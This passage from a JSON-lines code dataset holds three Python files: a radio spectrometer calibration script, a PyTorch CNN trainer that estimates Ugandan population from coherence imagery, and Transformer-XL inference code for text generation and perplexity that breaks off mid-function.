mp.Process(target=self.spec0.main)\n# p1 = mp.Process(target=self.spec1.main)\n# p0.start()\n# p1.start()\n# print time.time()\n\n# The ambient load in detector is on the low order bit (1) of byte 1 of\n# the dio and out is on the next bit (2).\n def runSpectrometer(self, verbose=True):\n noCal = True\n fp = 0\n while True:\n if noCal:\n# Wait for the ambient load to be in position\n print(\"Waiting for ambient load in\")\n while self.spec.dio.read(1) != 1:\n time.sleep(0.5)\n#Set up to make an ambient load measurement\n print(\"Starting to take ambient load data\")\n ambientCount = 0\n while self.spec.sweep(checkAmbientLoad=True):\n if ambientCount == 0:\n hotVals = self.spec.vals.copy()\n else:\n hotVals = hotVals + self.spec.vals\n ambientCount += 1\n if verbose:\n print(\"Count = %d\" % (ambientCount))\n if ambientCount >= 1:\n self.hotVals = hotVals/ambientCount-self.spec.zeros\n if fp != 0:\n fp.close()\n fileName = self.getFileName()\n fp = open(fileName, \"w\")\n fp.write(\"# Start %.3f Stop %.3f StepSize %.3f\\n\" % \\\n (self.spec.fStart, self.spec.fStop, self.spec.df))\n print(\"New file opened %s,ambientCount = %d\" % (fileName,ambientCount))\n fp.write(\"%.3f \" % (time.time()))\n self.hotVals.tofile(fp, sep=\" \", format=\"%.1f\")\n fp.write(\"\\n\")\n noCal = False\n skyStarted = False\n else:\n# wait for ambient load completely out\n loadPos = self.spec.dio.read(1)\n if loadPos != 2:\n if skyStarted:\n noCal = True\n else:\n time.sleep(0.1)\n continue\n# collect and write out 10 sky measurements\n skyCount = 0\n if skyStarted == False:\n print(\"Starting sky observations\")\n time.sleep(0.5)\n while self.spec.sweep(checkAmbientLoad=True):\n if skyCount == 0:\n skyStarted = True\n coldVals = self.spec.vals.copy()\n else:\n coldVals = coldVals + self.spec.vals\n skyCount += 1\n if skyCount == 15:\n self.coldVals = coldVals/skyCount-self.spec.zeros\n fp.write(\"%.3f \" % (time.time()))\n self.coldVals.tofile(fp, sep=\" \", format=\"%.1f\")\n fp.write(\"\\n\")\n fp.flush()\n skyCount = 0\n if verbose:\n print(\"Recording a sky scan\", end = \" \")\n self.calcTsys()\n\n# Calculate the average Tsys over 2 GHz bands. Since I want to average Tsys,\n# I sill calculate the inverse of Y.\n# Average the low band from 4.5-6 GHz and the others over a full 2 GHz band\n def calcTsys(self):\n y = self.hotVals/self.coldVals\n fLow = 4.5\n i = 0\n for fHigh in range(6,17,2):\n chLow = int((fLow-self.spec.fStart)/self.spec.df)\n chHigh = int((fHigh-self.spec.fStart)/self.spec.df)\n self.Tsys[i] = 293/(np.mean(y[chLow:chHigh]) - 1)\n fLow = fHigh\n i += 1\n for v in self.Tsys:\n print(\"%.1f\" % (v), end = \" \")\n print()\n\n def checkDIO(self):\n new = self.spec.dio.read(1)\n old = -1\n while True:\n new = self.spec.dio.read(1)\n if new != old:\n print(new)\n old = new\n\n def hot(self, numInts = 1):\n self.spec.sweep()\n self.hotVals = self.spec.vals.copy()\n if numInts > 1:\n for i in range(numInts-1):\n self.spec.sweep()\n self.hotVals = self.hotVals + self.spec.vals\n# print \"i =%d val = %d hotVal = %d\" % (i, self.spec.vals[0], self.hotVals[0])\n self.hotVals = self.hotVals/numInts\n self.hotVals = self.hotVals - self.spec.zeros\n if self.spec.doPlot:\n plt.clf()\n plt.plot(self.spec.freqs, self.hotVals)\n plt.show(block = False)\n\n def cold(self, numInts = 1):\n self.spec.sweep()\n self.coldVals = self.spec.vals.copy()\n if numInts > 1:\n for i in range(numInts-1):\n self.spec.sweep()\n self.coldVals = self.coldVals + self.spec.vals\n# print \"i =%d val = %d coldVal = %d\" % (i, self.spec.vals[240], self.coldVals[240])\n self.coldVals = self.coldVals / numInts\n self.coldVals = self.coldVals - self.spec.zeros\n if self.spec.doPlot:\n plt.plot(self.spec.freqs, self.coldVals)\n plt.show(block = False)\n \n def zero(self):\n avg = np.zeros(self.spec.nSamp)\n \n self.spec.amplifierPower(0)\n for i in range(5):\n self.spec.sweep()\n avg = avg + self.spec.vals\n avg = avg / 5\n self.spec.amplifierPower(1)\n self.zeroFit = np.polyfit(self.spec.freqs[20:],avg[20:],1)\n self.spec.zeros = np.polyval(self.zeroFit, self.spec.freqs)\n if self.spec.doPlot:\n plt.plot(self.spec.freqs,avg, self.spec.freqs, self.spec.zeros)\n plt.show(block = False)\n print(\"Fit const = %.1f slope %.2f std = %.2f\" % \\\n ( self.zeroFit[1], self.zeroFit[0], np.std(avg-self.spec.zeros)))\n \n def saveZero(self, fname=\"zeroParams\"):\n fn = '/instance/configFiles/' + fname + ( \"%d\" % (self.spec.number))\n# fd = open(fn, 'w')\n# fd.write(\"%.3f %.3f\" % (test.zeroFit[0], self.zeroFit[1]))\n np.savetxt(fn, self.zeroFit, \"%.3f\")\n\n def readZero(self, fname=\"zeroParams\"):\n fn = '/instance/configFiles/' + fname + ( \"%d\" % (self.spec.number))\n# fn = \"/home/smauser/\"+fname+\"%d\" % (self.spec.number)\n# fd = open(fn, 'r')\n self.zeroFit = np.genfromtxt(fn)\n freq = self.spec.fStart\n for i in range(self.spec.nSamp):\n self.spec.freqs[i] = freq\n freq += self.spec.df\n self.spec.zeros = np.polyval(self.zeroFit, self.spec.freqs)\n\n def Y(self, fname=\"Y.txt\"):\n Y = (self.hotVals)/(self.coldVals)\n np.savetxt(fname, np.c_[self.spec.freqs, self.hotVals, self.coldVals, Y], fmt = \"%.3f %d %d %.3f\")\n if self.spec.doPlot:\n plt.clf()\n plt.plot(self.spec.freqs, Y)\n plt.draw()\n","sub_path":"online/Linux/applications/pi/ScanningSpectrometer/test_spectrometer.py","file_name":"test_spectrometer.py","file_ext":"py","file_size_in_byte":10168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"117131189","text":"import tqdm\nimport time\nimport sys\nimport re\nimport os\nimport gdal\nimport json\nimport argparse\nimport shutil\nimport inspect\nimport itertools\nimport csv\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nfrom torchvision import models\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom torch.utils.data import Dataset, DataLoader, random_split, Subset\nimport random\nimport cProfile\nimport pstats\nfrom CNN_Uganda_ConvNet import CNN\n'''\nThis training script is adopted from train_Uganda and fit to the purpose of only training a CNN on interferometric coherence band.\nFor more detaisl refer to the Technical report and train_Uganda script \nScript by Johanna Kauffert\n'''\n\nmapdir = \"/exports/eddie/scratch/s1937352\"\nlogdir = \"/exports/eddie/scratch/s1937352/logs\"\n\n\nclass FileDataset(Dataset):\n \"\"\"\n This class combines Population data and image data to feed it into the CNN. \n The image data is a 8 dimensional numpy array that is calculated based on the entries of the \n dictionary.\n \"\"\"\n\n images = ['Coherence','vv', 'vh', 'S2']\n bands = ['B4', 'B3', 'B2', 'B8', 'B11', 'vv', 'vh', 'Coherence']\n \n def __init__(self,dictionary):\n # create a list with all keys that have data in all bands\n self.keys_list = []\n with open(f'{mapdir}/{dictionary}') as json_file:\n self.dictTiles = json.load(json_file)\n\n for element in self.dictTiles:\n if self.dictTiles[element].get(\"pop\") != None:\n if self.dictTiles[element].get(\"S2\") != None:\n if self.dictTiles[element].get(\"vv\") != None:\n if self.dictTiles[element].get(\"vh\") != None:\n if self.dictTiles[element].get(\"Coherence\") != None:\n self.keys_list.append(element)\n \n #check how long the list is\n print(len(self.keys_list))\n \n #get width and height of a tile so that it can be further used\n for i in self.keys_list:\n imgdir = self.dictTiles[i][\"S2\"]\n coords = self.dictTiles[i][\"extent\"]\n tile = gdal.Translate('',\n imgdir,\n projWin=coords,\n format='VRT')\n tile_arr = tile.ReadAsArray()\n self.S2bands, self.width, self.height = tile_arr.shape\n print(self.S2bands, self.width, self.height)\n break\n \n #shuffle the list so that tiles next to each other are apart\n random.seed(430)\n random.shuffle(self.keys_list)\n \n def __len__(self):\n #function needed by PyTorch\n return len(self.keys_list)\n\n def __getitem__(self,idx):\n # here is more information about this:\n #https://pytorch.org/tutorials/beginner/data_loading_tutorial.html\n\n #get the key for the dict\n key = self.keys_list[idx]\n coords = self.dictTiles[key][\"extent\"]\n pop = self.dictTiles[key][\"pop\"]\n pops = np.array(pop, dtype=np.float32)\n pop = pops\n\n #create empty 8D list\n return_img = np.empty((1, self.width, self.height), dtype=np.float32)\n\n #loop thorugh the image names to generate the array from different images\n for band_id, band_name in enumerate(self.images):\n #get the imagedir\n imgdir = self.dictTiles[key][self.images[band_id]]\n\n if band_id == 0:\n tile = gdal.Translate('',\n imgdir,\n projWin=coords,\n format='VRT')\n tile_arr = tile.ReadAsArray()\n return_img[0, :, :] = tile_arr\n\n else:\n continue\n\n return return_img, pop\n\n\ndef mse(out, y):\n loss = F.mse_loss(out, y)\n acc = float(np.sqrt(loss.data.item()))\n return loss, acc\n '''\n #Creates a criterion that measures the mean \n #squared error (squared L2 norm) between each element in the input xx and target yy .\n #das vllt mal testen\n criterion = nn.MSELoss()\n loss = torch.sqrt(criterion(x, y))\n loss.backward()\n print(x.grad)\n '''\n\ndef l1(out, y):\n loss = F.l1_loss(out, y)\n acc = loss.data.item()\n return loss, acc\n\n\ndef smooth(out, y):\n '''\n Creates a criterion that uses a squared term if the absolute element-wise error \n falls below 1 and an L1 term otherwise. It is less sensitive to outliers than\n the MSELoss and in some cases prevents exploding gradients\n '''\n loss = F.smooth_l1_loss(out, y)\n acc = loss.data.item()\n return loss, acc\n\n\n\n\n\nclass Job(object):\n\n def __init__(\n self,\n exp_name,\n dataset=None,\n batch_size=64,\n seed=12345,\n num_layers=4,\n num_filters=128,\n num_epochs=5,\n learning_rate=1e-5,\n dropout_rate=0.1,\n l2=0.2,\n kernel_size=5,\n loss_fn=smooth,\n early_stop_mem=0,\n alt_cnn=False,\n kfold=0,\n start=0,\n small = False,\n parish = 3\n ):\n self.exp_name = exp_name\n self.dataset = dataset\n self.batch_size = batch_size\n self.seed = seed\n self.num_layers = num_layers\n self.num_filters = num_filters\n self.kernel_size = kernel_size\n self.num_epochs = num_epochs\n self.learning_rate = learning_rate\n self.dropout_rate = dropout_rate\n self.l2 = l2\n self.loss_fn = loss_fn\n self.early_stop_mem = early_stop_mem\n self.alt_cnn = alt_cnn\n self.kfold = kfold\n self.params = locals()\n self.start = start\n self.small = small\n self.parish = parish\n\n del self.params['self']\n del self.params['dataset']\n self.params['loss_fn'] = self.params['loss_fn'].__name__\n\n self.train_duration = None\n self.best_loss = (\"-1\", float(\"inf\"), float(\"inf\"))\n\n self.jobpath = self.initialise_log_dir()\n\n self.device = self.initialise_pytorch()\n if self.parish == 0:\n self.train, self.val, self.data_shape= self.initialise_datasets_parish_train()\n elif self.parish == 1:\n self.test, self.data_shape = self.initialise_datasets_parish_test()\n else:\n self.train, self.val, self.test, self.data_shape = self.initialise_datasets_orig()\n\n #self.train, self.val, self.test, self.data_shape = self.initialise_datasets_orig()\n self.model = self.initialise_cnn()\n self.optimiser = optim.Adam(self.model.parameters(),\n lr=self.learning_rate,\n weight_decay=self.l2)\n\n def save_model(self):\n # Save the model to disk\n self.model.cpu()\n torch.save(self.model, \"{}/model.pt\".format(self.jobpath))\n self.model.to(self.device)\n\n def train_model(self):\n # Perform training on the model\n train_start_time = time.time()\n best_val_loss = float(\"inf\")\n for i in range(self.start, self.start + self.num_epochs, 1):\n train_losses = 0.0\n print(\"I am here\")\n self.model.train()\n with tqdm.tqdm(total=len(self.train) * self.train.batch_size) as bar:\n bar.set_description(\"Training |Epoch {}\".format(i))\n for j, (x, y) in enumerate(self.train):\n x, y = [torch.Tensor(z).to(device=self.device) for z in [x, y]]\n self.optimiser.zero_grad()\n out = self.model.forward(x).view(-1)\n #print(out)\n loss, acc = self.loss_fn(out, y)\n #print(loss,acc)\n train_losses += acc\n loss.backward()\n self.optimiser.step()\n bar.update(self.train.batch_size)\n val_losses = self.validate_model(i)\n train_loss = train_losses / len(self.train)\n val_loss = val_losses / len(self.val)\n if val_loss < self.best_loss[2]:\n self.best_loss = (i, train_loss, val_loss)\n elif (self.early_stop_mem != 0 and i - self.best_loss[0] >= self.early_stop_mem):\n break\n print(\"Training |RMS loss {} : {:0.2f}\".format(i, train_loss))\n print(\"Validation|RMS loss {} : {:0.2f}\\n\".format(i, val_loss))\n best_val_loss = self.record_data(i, train_loss, val_loss, best_val_loss)\n print(*self.best_loss)\n self.train_duration = (time.time() - train_start_time)/60\n t_ofile = '{}/duration.txt'.format(self.jobpath)\n\n with open(t_ofile, 'w') as f:\n f.write(str(self.train_duration))\n\n def validate_model(self, epoch):\n # Perform validation on the model\n losses = 0.0\n self.model.eval()\n with tqdm.tqdm(total=len(self.val) * self.val.batch_size) as bar:\n bar.set_description(\"Validation|Epoch {}\".format(epoch))\n for j, (x, y) in enumerate(self.val):\n x, y = [torch.Tensor(z).to(device=self.device) for z in [x, y]]\n out = self.model.forward(x)\n loss = F.l1_loss(out, y).view(-1)\n losses += loss.data.item()\n bar.update(self.val.batch_size)\n return losses\n\n def record_data(self, epoch, train_loss, val_loss, best_val_loss):\n # Record training data to the current job's log file\n ofile = '{}/data.csv'.format(self.jobpath)\n with open(ofile, 'a') as f:\n writer = csv.writer(f)\n if epoch == 0:\n writer.writerow(['epoch', 'train_loss', 'val_loss'])\n writer.writerow([epoch, train_loss, val_loss])\n if best_val_loss > val_loss:\n best_val_loss = val_loss\n self.save_model()\n return best_val_loss\n\n def initialise_cnn(self):\n # Set up the model to be trained, either by loading an existing model\n # or creating one from scratch.\n if self.start == 0:\n if self.alt_cnn:\n model = models.vgg11(pretrained=False)\n num_fts = model.classifier[6].in_features\n model.classifier[6] = nn.Linear(num_fts, 1)\n else:\n data_shape = (self.batch_size, self.data_shape[0], self.data_shape[1],\n self.data_shape[2])\n model = CNN(data_shape, self.num_layers, self.num_filters, self.dropout_rate,\n self.kernel_size)\n \n elif os.path.exists(f\"{self.jobpath}/model.pt\"):\n model = torch.load(\"{}/model.pt\".format(self.jobpath))\n \n \n \n else:\n data_shape = (self.batch_size, self.data_shape[0], self.data_shape[1], self.data_shape[2])\n model = CNN(data_shape, self.num_layers, self.num_filters, self.dropout_rate, self.kernel_size)\n\n\n model.to(self.device)\n return model\n\n\n\n\n def initialise_datasets_parish_train(self):\n if self.dataset is None:\n self.dataset = FileDataset()\n data_shape = self.dataset[0][0].shape\n len_orig = len(self.dataset)\n split_lengths = [int(0.15 * len(self.dataset))]\n split_lengths = [len(self.dataset) - sum(split_lengths)] + split_lengths\n sets = random_split(self.dataset, split_lengths)\n train, val, = [\n DataLoader(x, batch_size=b, shuffle=True, pin_memory=True, num_workers=4)\n for x, b in zip(sets, [self.batch_size, self.batch_size])\n ]\n return train, val, data_shape\n\n def initialise_datasets_parish_test(self):\n if self.dataset is None:\n self.dataset = FileDataset()\n data_shape = self.dataset[0][0].shape\n\n test = DataLoader(self.dataset, batch_size=b, shuffle=True, pin_memory=True, num_workers=4)\n\n return test, data_shape\n\n def initialise_datasets_orig(self):\n # Initialise data, partitioning randomly into 80% train, 10% val, 10% t$\n if self.dataset is None:\n self.dataset = FileDataset()\n data_shape = self.dataset[0][0].shape\n len_orig = len(self.dataset)\n if self.small:\n\n slit_half = [int(0.25 * len(self.dataset))]*4\n dataset,d2,d3,d4 = random_split(self.dataset, slit_half)\n #datatset = dataset[0]\n print(len(dataset))\n split_length = [int(0.2*len(dataset))]*2\n split_length = [len(dataset)-sum(split_length)]+split_length\n sets = random_split(dataset, split_length)\n\n else:\n #make a list of twice 10 % of the dataset length\n split_lengths = [int(0.1 * len(self.dataset))] * 2\n # add to the list 80% of the dataset length\n split_lengths = [len(self.dataset) - sum(split_lengths)] + split_lengt\n #randomly split the dataset into 80,10,10\n sets = random_split(self.dataset, split_lengths)\n \n train, val, test = [\n DataLoader(x, batch_size=b, shuffle=True, pin_memory=True, num_workers=4)\n for x, b in zip(sets, [self.batch_size, self.batch_size, 1])\n ]\n return train, val, test, data_shape\n\n def initialise_log_dir(self):\n # Set up a log directory for the current job.\n print(logdir)\n jobpath = f'{logdir}/{self.exp_name}'\n print(jobpath)\n\n if self.start == 0:\n if os.path.isdir(jobpath):\n shutil.rmtree(jobpath)\n os.mkdir(jobpath)\n elif not os.path.isdir(jobpath):\n os.mkdir(jobpath)\n with open(\"{}/paramfile.json\".format(jobpath), 'w') as f:\n f.write(json.dumps(self.params))\n return jobpath\n\n def initialise_pytorch(self):\n # Set up pytorch parameters.\n torch.manual_seed(self.seed)\n if torch.cuda.is_available():\n print(\"Training CNN with GPU\")\n return torch.device('cuda')\n else:\n print(\"Training CNN with CPU\")\n return torch.device('cpu')\n\n\nclass JobScheduler(object):\n\n def __init__(self,dict):\n self.dataset = FileDataset(dict)\n\n def name(self, val):\n return val.__name__ if hasattr(val, \"__name__\") else str(val)\n\n\n def train_model_list(self,log_name,num_epochs,start,learnr,small,l2,parish):\n # Train a number of specified jobs.\n if os.path.isdir(f'{logdir}/{log_name}'):\n with open(f'{logdir}/{log_name}/paramfile.json') as json_file:\n paramdict = json.load(json_file)\n start = paramdict.get(\"start\")\n num_epochs = paramdict.get(\"num_epochs\")\n start = start+num_epochs\n else:\n start = start\n\n jobs = [\n Job(log_name,\n dataset=self.dataset,\n num_epochs=num_epochs,\n early_stop_mem=0,\n kfold=0,\n loss_fn=smooth,\n learning_rate=learnr,\n start=start,\n l2 = l2,\n small = small,\n parish=parish)]\n\n for i, job in enumerate(jobs):\n job.train_model()\n\n\ndef readCommands():\n '''\n Read commandline arguments\n '''\n p = argparse.ArgumentParser(description=(\"Get parameters for training the CNN\"))\n p.add_argument(\"--log_name\", dest =\"log_name\", type=str, default=\"CNN_number\", help=(\"Specify a name for the CNN\"))\n p.add_argument(\"--num_epochs\", dest =\"num_epochs\", type=int, default=20, help=(\"Number of epochs\"))\n p.add_argument(\"--start\", dest =\"start\", type=int, default=0, help=(\"Specify a epoch number\"))\n p.add_argument(\"--learning-rate\", dest =\"learning_rate\", type=float, default=0.00001, help=(\"Specify a learning rate\"))\n p.add_argument(\"--l2\", dest =\"l2\", type=float, default=0.01, help=(\"Specify l2\"))\n p.add_argument(\"--parish\", dest =\"parish\", type=int, default=0, help=(\"Train on Paris (0:Train, 1:Test), train on whole dictionary (3)\"))\n p.add_argument(\"--dict\", dest =\"dict\", type=str, default=\"dictionary_p2.json\", help=(\"Specify a dictionary that will be used\"))\n p.add_argument(\"--smalldata\", dest =\"small\", type=bool, default=False, help=(\"Use Small dataset\"))\n cmdargs = p.parse_args()\n return cmdargs\n\n\n\ndef main():\n cmd=readCommands()\n log_name=cmd.log_name\n num_epochs=cmd.num_epochs\n start=cmd.start\n learnr=cmd.learning_rate\n dict=cmd.dict\n small=cmd.small\n parish=cmd.parish\n l2=cmd.l2\n js = JobScheduler(dict)\n js.train_model_list(log_name,num_epochs,start,learnr,small,l2,parish)\n\n\n\nif __name__ == \"__main__\":\n\n PROFILE = 'process.profile'\n prf = cProfile.run('main()', PROFILE)\n\n p = pstats.Stats(PROFILE)\n p.sort_stats('cumtime').print_stats(20)\n","sub_path":"CNN/Coherence_CNN.py","file_name":"Coherence_CNN.py","file_ext":"py","file_size_in_byte":16906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"533300042","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport re\nimport math\nimport time\nfrom absl import flags\nfrom progressbar import ProgressBar\nimport absl.logging as _logging # pylint: disable=unused-import\n\nimport tensorflow as tf\nimport model\nimport data_utils\nfrom vocabulary import Vocab\nfrom gpu_utils import assign_to_gpu, average_grads_and_vars\nfrom postprocess import top_one_result, top_n_prob, gen_on_keyword, gen_diversity\nimport numpy as np\nimport multiprocessing\nimport random\nimport csv\nimport pandas as pd\n\n# GPU config\nflags.DEFINE_integer(\"num_core_per_host\", default=8, help=\"Number of cores per host\")\nflags.DEFINE_integer(\"multiprocess\", default=2, lower_bound=1, help=\"Number of processes\")\n\n# Experiment (data/checkpoint/directory) config\nflags.DEFINE_string(\"corpus_info_path\", default=\"\", help=\"Path to corpus-info.json file.\")\nflags.DEFINE_string(\"model_dir\", default=None, help=\"Estimator model_dir.\")\nflags.DEFINE_string(\"dataset\", \"tmall\", help=\"Dataset name.\")\nflags.DEFINE_string(\"input_file_dir\", default=None, help=\"Input file_dir.\")\nflags.DEFINE_string(\"output_file_dir\", default=None, help=\"Output file_dir.\")\nflags.DEFINE_bool(\"do_sent_gen\", default=False, help=\"Whether to predict next word probability.\")\nflags.DEFINE_bool(\"do_sent_ppl_pred\", default=False, help=\"Whether to predict sentence perplexity.\")\nflags.DEFINE_integer(\"limit_len\", default=50, help=\"Limited length of input sentence.\")\nflags.DEFINE_integer(\"gen_len\", default=30, help=\"Number of token to generate.\")\nflags.DEFINE_integer(\"pred_batch_size\", default=16, help=\"Size of predition batch.\")\n\n# Model config\nflags.DEFINE_integer(\"mem_len\", default=10, help=\"Number of steps to cache\")\nflags.DEFINE_bool(\"same_length\", default=False, help=\"Same length attention\")\nflags.DEFINE_integer(\"clamp_len\", default=-1, help=\"Clamp length\")\nflags.DEFINE_integer(\"n_layer\", default=6, help=\"Number of layers.\")\nflags.DEFINE_integer(\"d_model\", default=500, help=\"Dimension of the model.\")\nflags.DEFINE_integer(\"d_embed\", default=500, help=\"Dimension of the embeddings.\")\nflags.DEFINE_integer(\"n_head\", default=10, help=\"Number of attention heads.\")\nflags.DEFINE_integer(\"d_head\", default=50, help=\"Dimension of each attention head.\")\nflags.DEFINE_integer(\"d_inner\", default=1000, help=\"Dimension of inner hidden size in positionwise feed-forward.\")\nflags.DEFINE_float(\"dropout\", default=0.1, help=\"Dropout rate.\")\nflags.DEFINE_float(\"dropatt\", default=0.1, help=\"Attention dropout rate.\")\nflags.DEFINE_bool(\"untie_r\", default=False, help=\"untie r_w_bias and r_r_bias\")\n\n# Adaptive Softmax / Embedding\nflags.DEFINE_integer(\"div_val\", default=1, help=\"Divide the embedding size by this val for each bin\")\nflags.DEFINE_bool(\"proj_share_all_but_first\", default=False,\n help=\"True to share all but first projs, False not to share.\")\nflags.DEFINE_bool(\"proj_same_dim\", default=True, help=\"Project the bin with the same dimension.\")\n\n# Parameter initialization\nflags.DEFINE_enum(\"init\", default=\"normal\", enum_values=[\"normal\", \"uniform\"], help=\"Initialization method.\")\nflags.DEFINE_float(\"init_std\", default=0.02, help=\"Initialization std when init is normal.\")\nflags.DEFINE_float(\"proj_init_std\", default=0.01, help=\"Initialization std for embedding projection.\")\nflags.DEFINE_float(\"init_range\", default=0.1, help=\"Initialization std when init is uniform.\")\n\nFLAGS = flags.FLAGS\n\ndef sent_gen(tmp_Vocab, input_txt, n_token, cutoffs, ps_device):\n\n test_list = tf.placeholder(tf.int64, shape=[1, None])\n dataset = tf.data.Dataset.from_tensors(test_list)\n # dataset = dataset.batch(1, drop_remainder=True)\n\n iterator = dataset.make_initializable_iterator()\n input_feed = iterator.get_next()\n\n inputs = tf.split(input_feed, FLAGS.num_core_per_host, 0)\n\n per_core_bsz = 1\n tower_mems, tower_losses, tower_new_mems = [], [], []\n tower_output = []\n tower_mems_id = []\n tower_new_mems_id = []\n tower_attn_prob = []\n\n for i in range(FLAGS.num_core_per_host):\n with tf.device(assign_to_gpu(i, ps_device)), \\\n tf.variable_scope(tf.get_variable_scope(), reuse=tf.AUTO_REUSE):\n mems_i = [tf.placeholder(tf.float32,\n [FLAGS.mem_len, per_core_bsz, FLAGS.d_model])\n for _ in range(FLAGS.n_layer)]\n\n mems_i_id = [tf.placeholder(tf.int64,\n [FLAGS.mem_len, per_core_bsz])\n for _ in range(FLAGS.n_layer)]\n\n new_mems_i, output_i, new_mems_i_id, attn_prob_i = single_core_graph_for_inference(\n n_token=n_token,\n cutoffs=cutoffs,\n is_training=False,\n inp=inputs[i],\n mems=mems_i,\n mems_id=mems_i_id)\n\n tower_mems.append(mems_i)\n tower_new_mems.append(new_mems_i)\n tower_output.append(output_i)\n tower_mems_id.append(mems_i_id)\n tower_new_mems_id.append(new_mems_i_id)\n tower_attn_prob.append(attn_prob_i)\n\n # Evaluation loop\n tower_mems_np = [\n [np.zeros([FLAGS.mem_len, per_core_bsz, FLAGS.d_model], dtype=np.float32)\n for layer in range(FLAGS.n_layer)]\n for core in range(FLAGS.num_core_per_host)\n ]\n\n tower_mems_id_np = [\n [np.zeros([FLAGS.mem_len, per_core_bsz], dtype=np.float32)\n for layer in range(FLAGS.n_layer)]\n for core in range(FLAGS.num_core_per_host)\n ]\n\n saver = tf.train.Saver()\n\n with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:\n sess.run(tf.global_variables_initializer())\n\n eval_ckpt_path = tf.train.latest_checkpoint(FLAGS.model_dir)\n\n saver.restore(sess, eval_ckpt_path)\n\n if input_txt == \"\":\n txt_gen = tmp_Vocab.get_sym(random.randint(3, len(tmp_Vocab.idx2sym) - 1))\n else:\n txt_gen = input_txt\n\n fetches = [tower_new_mems,\n tower_output,\n tower_new_mems_id,\n tower_attn_prob,\n 'transformer/adaptive_embed/lookup_table:0']\n\n encoded_input = tmp_Vocab.encode_sents(txt_gen, ordered=True)\n\n progress = ProgressBar()\n for _ in progress(range(FLAGS.gen_len)):\n time.sleep(0.01)\n feed_dict = {}\n for i in range(FLAGS.num_core_per_host):\n for m, m_np in zip(tower_mems[i], tower_mems_np[i]):\n feed_dict[m] = m_np\n\n for id, id_np in zip(tower_mems_id[i], tower_mems_id_np[i]):\n feed_dict[id] = id_np\n\n sess.run(iterator.initializer, feed_dict={test_list: [encoded_input]})\n fetched = sess.run(fetches, feed_dict=feed_dict)\n\n tower_mems_np, output = fetched[:2]\n\n tower_mems_id_np = fetched[2]\n\n tmp_list = output[0][-1][0]\n tmp_list = tmp_list.tolist()\n\n index = top_one_result(tmp_list)\n\n txt_gen += tmp_Vocab.get_sym(index)\n if tmp_Vocab.get_sym(index) == \"\":\n break\n else:\n encoded_input = [index]\n\n return txt_gen\n\n\ndef sent_ppl(input_txt_list, n_token, cutoffs, ps_device):\n\n test_list = tf.placeholder(tf.int64, shape=[FLAGS.pred_batch_size, None])\n dataset = tf.data.Dataset.from_tensors(test_list)\n # dataset = dataset.batch(1, drop_remainder=True)\n\n iterator = dataset.make_initializable_iterator()\n input_feed = iterator.get_next()\n\n inputs = tf.split(input_feed, FLAGS.num_core_per_host, 0)\n\n per_core_bsz = FLAGS.pred_batch_size\n tower_mems, tower_new_mems = [], []\n tower_output = []\n tower_mems_id = []\n tower_new_mems_id = []\n tower_attn_prob = []\n\n for i in range(FLAGS.num_core_per_host):\n with tf.device(assign_to_gpu(i, ps_device)), \\\n tf.variable_scope(tf.get_variable_scope(), reuse=tf.AUTO_REUSE):\n mems_i = [tf.placeholder(tf.float32,\n [FLAGS.mem_len, per_core_bsz, FLAGS.d_model])\n for _ in range(FLAGS.n_layer)]\n\n mems_i_id = [tf.placeholder(tf.int64,\n [FLAGS.mem_len, per_core_bsz])\n for _ in range(FLAGS.n_layer)]\n\n new_mems_i, output_i, new_mems_i_id, attn_prob_i = single_core_graph_for_inference(\n n_token=n_token,\n cutoffs=cutoffs,\n is_training=False,\n inp=inputs[i],\n mems=mems_i,\n mems_id=mems_i_id)\n\n tower_mems.append(mems_i)\n tower_new_mems.append(new_mems_i)\n tower_output.append(output_i)\n tower_mems_id.append(mems_i_id)\n tower_new_mems_id.append(new_mems_i_id)\n tower_attn_prob.append(attn_prob_i)\n\n # Evaluation loop\n tower_mems_np = [\n [np.zeros([FLAGS.mem_len, per_core_bsz, FLAGS.d_model], dtype=np.float32)\n for layer in range(FLAGS.n_layer)]\n for core in range(FLAGS.num_core_per_host)\n ]\n\n tower_mems_id_np = [\n [np.zeros([FLAGS.mem_len, per_core_bsz], dtype=np.float32)\n for layer in range(FLAGS.n_layer)]\n for core in range(FLAGS.num_core_per_host)\n ]\n\n saver = tf.train.Saver()\n\n #with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:\n gpu_config = tf.ConfigProto(allow_soft_placement=True)\n gpu_config.gpu_options.allow_growth = True # 按需分配内存\n gpu_config.gpu_options.per_process_gpu_memory_fraction = 0.2 # 限制单进程只能占用GPU显存一定比例\n with tf.Session(config=gpu_config) as sess:\n sess.run(tf.global_variables_initializer())\n\n eval_ckpt_path = tf.train.latest_checkpoint(FLAGS.model_dir)\n\n saver.restore(sess, eval_ckpt_path)\n\n fetches = [tower_new_mems,\n tower_output,\n tower_new_mems_id,\n tower_attn_prob,\n 'transformer/adaptive_embed/lookup_table:0']\n\n sent_ppl_list = [[] for _ in range(per_core_bsz)]\n\n def _cal_ppl(log_prob_list, sent_len):\n ### the first token of encoded txt is special token , so skip the first one\n log_prob = sum(log_prob_list[:sent_len-1])\n #pplx = pow(math.exp((-1)*log_prob), 1/(sent_len-1))\n ppl = math.exp((-1)*log_prob/(sent_len-1))\n\n return ppl\n\n for batch_id in range(input_txt_list[0].shape[1]):\n input_batch = input_txt_list[0][:,batch_id,:]\n input_lens = input_txt_list[1][:,batch_id]\n\n tower_mems_np = [\n [np.zeros([FLAGS.mem_len, per_core_bsz, FLAGS.d_model], dtype=np.float32)\n for layer in range(FLAGS.n_layer)]\n for core in range(FLAGS.num_core_per_host)\n ]\n\n tower_mems_id_np = [\n [np.zeros([FLAGS.mem_len, per_core_bsz], dtype=np.float32)\n for layer in range(FLAGS.n_layer)]\n for core in range(FLAGS.num_core_per_host)\n ]\n\n #print(\"Encoded Input:\", input_batch)\n\n log_probs = [[] for _ in range(per_core_bsz)]\n\n for token in range(1, input_batch.shape[-1]):\n feed_dict = {}\n for i in range(FLAGS.num_core_per_host):\n for m, m_np in zip(tower_mems[i], tower_mems_np[i]):\n feed_dict[m] = m_np\n\n for id, id_np in zip(tower_mems_id[i], 